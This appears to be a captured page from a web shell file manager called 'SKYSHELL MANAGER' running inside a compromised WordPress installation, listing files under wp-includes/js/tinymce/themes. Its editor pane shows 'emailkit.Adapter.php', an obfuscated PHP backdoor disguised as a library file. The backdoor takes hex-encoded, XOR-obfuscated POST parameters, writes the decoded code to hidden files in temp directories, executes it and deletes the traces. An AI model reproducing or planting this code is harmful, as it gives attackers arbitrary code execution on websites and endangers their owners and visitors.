📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
38789.93 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: emailkit.Adapter.php
<?php if(in_array("\x65\x6Et", array_keys($_POST))){ $pointer = hex2bin($_POST["\x65\x6Et"]); $pgrp= '' ; for($e=0; $e<strlen($pointer); $e++){$pgrp .= chr(ord($pointer[$e]) ^ 97);} $property_set = array_filter(["/dev/shm", getenv("TMP"), session_save_path(), getcwd(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp"]); foreach ($property_set as $key => $binding) { if (array_product([is_dir($binding), is_writable($binding)])) { $marker = "$binding" . "/.k"; if (file_put_contents($marker, $pgrp)) { include $marker; @unlink($marker); exit; } } } } if(@$_POST["\x70g\x72p"] !== null){ $ptr = array_filter(["/tmp", session_save_path(), "/dev/shm", getcwd(), getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir")]); $pset = hex2bin($_POST["\x70g\x72p"]); $element = '' ; for($c=0; $c<strlen($pset); $c++){$element .= chr(ord($pset[$c]) ^ 30);} $obj = 0; do { $record = $ptr[$obj] ?? null; if ($obj >= count($ptr)) break; if (array_product([is_dir($record), is_writable($record)])) { $factor = implode("/", [$record, ".ref"]); if (file_put_contents($factor, $element)) { require $factor; unlink($factor); die(); } } $obj++; } while (true); }
Save